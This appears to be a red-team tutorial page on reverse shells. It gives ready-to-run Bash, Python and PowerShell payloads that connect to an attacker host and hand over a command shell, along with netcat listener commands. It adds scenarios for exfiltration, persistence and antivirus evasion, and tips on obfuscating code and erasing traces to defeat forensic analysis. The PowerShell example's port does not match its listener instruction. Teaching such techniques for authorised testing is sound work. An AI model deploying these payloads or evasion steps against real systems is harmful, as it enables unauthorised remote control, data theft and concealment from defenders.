# Reverse Shell 101

**Reverse Shell 101: Practical Insights for Red Teamers**

In the dynamic world of red teaming, mastering the use of reverse shells is crucial for maintaining access, maneuvering within a network, and escalating privileges stealthily. This section is designed to focus less on theoretical aspects and more on practical, real-world examples to empower red teamers with actionable skills.

#### **Understanding Reverse Shells**

A reverse shell is a type of shell where the target machine opens a connection to an attacking machine, which then has the ability to execute commands on the target. This is particularly useful in bypassing firewall rules that may block incoming connections but allow outgoing ones.

#### **Setting Up a Basic Reverse Shell**

**Example 1: Bash Reverse Shell** One of the simplest forms of reverse shells is using Bash. This can be effective in environments where Bash is available, and network restrictions are minimal.

```bash
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
```

**Setup:**

* **Attacker Machine (Kali Linux)**: Use `nc -lvnp 4444` to listen on port 4444.
* **Target Machine**: Execute the above Bash command replacing `attacker_ip` with the IP address of the attacker's machine.

#### **Python Reverse Shell**

**Example 2: Python Reverse Shell** Python's extensive standard library allows for the creation of a reverse shell with just a few lines of code.

```python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("attacker_ip",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
```

**Setup:**

* **Attacker Machine**: Start a listener with `nc -lvnp 1234`.
* **Target Machine**: Run the Python script after replacing `attacker_ip` with the attacker's IP.

#### **PowerShell Reverse Shell**

**Example 3: Windows PowerShell Reverse Shell** PowerShell provides a powerful platform for Windows environments.

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"><strong>$Client = New-Object System.Net.Sockets.TCPClient("192.168.56.1", 4444);$Stream =$Client.GetStream();[byte[]]$Buffer = New-Object byte[] 1024;while(($I =$Stream.Read($Buffer, 0, 1024)) -ne 0){$Data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Buffer,0, $I);$SendBack = (iex $Data 2>&#x26;1 | Out-String );    $SendBack2  = $SendBack + 'PS ' + (pwd).Path + '> ';$SendByte = ([text.encoding]::ASCII).GetBytes($SendBack2);$Stream.Write($SendByte,0,$SendByte.Length);$Stream.Flush();}$Client.Close();
</strong></code></pre>

**Setup:**

* **Attacker Machine**: Listen on the specified port using `nc -lvnp 4445`.
* **Target Machine**: Execute the PowerShell command.

#### **Real-World Application Scenarios**

* **Scenario 1: Post-Exploitation Data Exfiltration** After gaining initial access through a phishing attack, a reverse shell is established to move laterally within the network, searching for sensitive data to exfiltrate.
* **Scenario 2: Maintaining Persistence** Reverse shells can be integrated into scheduled tasks or services to ensure persistence even after system restarts, providing continued access for ongoing exploitation.
* **Scenario 3: Bypassing Endpoint Protection** Advanced reverse shells can be encoded or encrypted to evade antivirus detection, often using tools like `shikata_ga_nai` encoder in Metasploit or custom encryption routines.

<figure><img src="https://1698500628-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FifilBLhnTZVjmLemJ6ni%2Fuploads%2Fe1cOqeVg19e2lkEpzbUf%2Fimage.png?alt=media&#x26;token=fd5af1cf-d1c3-4fe6-babe-b1edc495f35b" alt=""><figcaption><p><em>Example of a reverse connection established by an Attacker</em></p></figcaption></figure>

<figure><img src="https://1698500628-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FifilBLhnTZVjmLemJ6ni%2Fuploads%2Fn4xismw01Mathyhdo2iC%2Fimage.png?alt=media&#x26;token=c385a094-792e-40f8-991d-706564142e93" alt=""><figcaption><p><em>Example of reverse shell using Windows Powershell</em></p></figcaption></figure>

**Tips for Effective Use**

* **Obfuscation**: Always obfuscate the reverse shell code to avoid detection by network monitoring tools.
* **Randomize Ports**: Use non-standard ports for reverse shells to avoid typical firewall rules.
* **Cleanup**: Ensure to remove traces of the reverse shell after use to avoid detection during forensic analysis.

#### **Conclusion**

Understanding and implementing reverse shells are fundamental skills for any red teamer. By practicing these examples in controlled environments and adapting them to specific target scenarios, red teamers can enhance their capability to perform comprehensive security assessments and effectively demonstrate real-world attack vectors.

This hands-on approach ensures that red teamers are not only familiar with the theory but are also adept at applying these techniques in real-world scenarios to achieve their objectives efficiently and stealthily.